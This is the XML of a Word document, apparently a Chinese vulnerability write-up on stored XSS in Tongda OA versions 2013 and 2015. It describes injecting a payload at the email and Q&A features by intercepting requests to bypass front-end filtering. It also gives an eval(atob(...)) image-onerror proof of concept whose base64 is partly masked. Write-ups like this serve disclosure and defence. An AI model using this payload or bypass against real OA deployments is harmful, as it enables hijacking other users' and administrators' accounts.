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通达oa-xss"/>
      <w:r>
        <w:t xml:space="preserve">通达oa xss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Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="二、漏洞影响"/>
      <w:r>
        <w:t xml:space="preserve">二、漏洞影响</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2013、2015版本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="三、复现过程"/>
      <w:r>
        <w:t xml:space="preserve">三、复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">发邮件的地方、问题问答的地⽅都存在XSS，可获取他人账号权限。⼀般情况下，OA会有前端进行过滤， 所以抓包时候去添加payload，之后会对事件进行过滤，所以使用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">poc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img src=x onerror=eval(atob('cz1jcmVXXXXXytNYXRoXXXXXXXXhbmRvbSgp'))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="212777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通达oa/img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7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92884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通达oa/img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8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这个漏洞获取admin权限⾮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2020-09-10T07:04:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-10T07:04:09Z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